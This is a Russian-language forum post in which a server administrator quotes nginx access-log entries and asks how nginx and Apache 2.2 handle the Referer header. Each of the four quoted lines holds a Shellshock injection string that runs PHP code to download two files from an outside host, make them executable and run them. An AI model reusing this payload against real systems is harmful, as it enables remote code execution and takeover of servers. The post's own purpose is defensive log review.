Не давно прочитав логи обнаружил что некий ip адрес пробует через referer взломать сервер.
Его запросы:
Свернутый текст
// "GET /cgi-bin/firmwarecfg HTTP/1.0" 503 206 "() { :;} ;echo;/usr/local/bin/php -r '$a = \x22http://r0r.me/r/r0r01\x22;''$b = \x22http://r0r.me/r/r0r02\x22;''$c = sys_get_temp_dir();''$d = \x22r0r01\x22;''$e = \x22r0r02\x22;''$f = \x22chmod 777\x22;''$g = \x22file_put_contents\x22;''$h = \x22system\x22;''$i = \x22file_exists\x22;''$j = \x22fopen\x22;''if ($i($c . \x22/$d\x22))''{''exit(1);''}else{''echo($c);''$g(\x22$c/$d\x22, $j(\x22$a\x22, \x22r\x22));''$g(\x22$c/$e\x22, $j(\x22$b\x22, \x22r\x22));''$h(\x22$f \x22 . $c .\x22/$d\x22);''$h(\x22$f \x22 . $c .\x22/$e\x22);''$h($c . \x22/$d\x22);''$h($c . \x22/$e\x22);''}'" "-" "-" "-"
// "GET /cgi-bin/%2f/admin.html HTTP/1.0" 503 206 "() { :;} ;echo;/usr/local/bin/php -r '$a = \x22http://r0r.me/r/r0r01\x22;''$b = \x22http://r0r.me/r/r0r02\x22;''$c = sys_get_temp_dir();''$d = \x22r0r01\x22;''$e = \x22r0r02\x22;''$f = \x22chmod 777\x22;''$g = \x22file_put_contents\x22;''$h = \x22system\x22;''$i = \x22file_exists\x22;''$j = \x22fopen\x22;''if ($i($c . \x22/$d\x22))''{''exit(1);''}else{''echo($c);''$g(\x22$c/$d\x22, $j(\x22$a\x22, \x22r\x22));''$g(\x22$c/$e\x22, $j(\x22$b\x22, \x22r\x22));''$h(\x22$f \x22 . $c .\x22/$d\x22);''$h(\x22$f \x22 . $c .\x22/$e\x22);''$h($c . \x22/$d\x22);''$h($c . \x22/$e\x22);''}'" "-" "-" "-"
// "GET /cgi-bin/admin.html HTTP/1.0" 503 206 "() { :;} ;echo;/usr/local/bin/php -r '$a = \x22http://r0r.me/r/r0r01\x22;''$b = \x22http://r0r.me/r/r0r02\x22;''$c = sys_get_temp_dir();''$d = \x22r0r01\x22;''$e = \x22r0r02\x22;''$f = \x22chmod 777\x22;''$g = \x22file_put_contents\x22;''$h = \x22system\x22;''$i = \x22file_exists\x22;''$j = \x22fopen\x22;''if ($i($c . \x22/$d\x22))''{''exit(1);''}else{''echo($c);''$g(\x22$c/$d\x22, $j(\x22$a\x22, \x22r\x22));''$g(\x22$c/$e\x22, $j(\x22$b\x22, \x22r\x22));''$h(\x22$f \x22 . $c .\x22/$d\x22);''$h(\x22$f \x22 . $c .\x22/$e\x22);''$h($c . \x22/$d\x22);''$h($c . \x22/$e\x22);''}'" "-" "-" "-"
// "GET /sys-cgi HTTP/1.0" 404 205 "() { :;} ;echo;/usr/local/bin/php -r '$a = \x22http://r0r.me/r/r0r01\x22;''$b = \x22http://r0r.me/r/r0r02\x22;''$c = sys_get_temp_dir();''$d = \x22r0r01\x22;''$e = \x22r0r02\x22;''$f = \x22chmod 777\x22;''$g = \x22file_put_contents\x22;''$h = \x22system\x22;''$i = \x22file_exists\x22;''$j = \x22fopen\x22;''if ($i($c . \x22/$d\x22))''{''exit(1);''}else{''echo($c);''$g(\x22$c/$d\x22, $j(\x22$a\x22, \x22r\x22));''$g(\x22$c/$e\x22, $j(\x22$b\x22, \x22r\x22));''$h(\x22$f \x22 . $c .\x22/$d\x22);''$h(\x22$f \x22 . $c .\x22/$e\x22);''$h($c . \x22/$d\x22);''$h($c . \x22/$e\x22);''}'" "-" "-" "-"
Это nginx access.log - данные запросы прошли нормально.
Человек сервер не взломал - подобных запросов куча.
Меня интересует несколько вопросов - как nginx и apache2 фильтруют запросы с referer, есть корень сайта и если передать 0 байт запрос не ищет файл в предыдущей директории, но вот меня гложет то что я не знаю как фильтруют запросы nginx и apache2 в плане referer (возможно они как то уязвимы именно этим), apache2 - 2.2 версия, может быть если им передать какой то левый байт в (referer) как то не так поймут и откроют злоумышленнику нужный ему файл?
Ответьте пожалуйста на мой вопрос, просто я очень переживаю на счет этого дела, а так как не знаю как работают данные программы решил спросить у опытных людей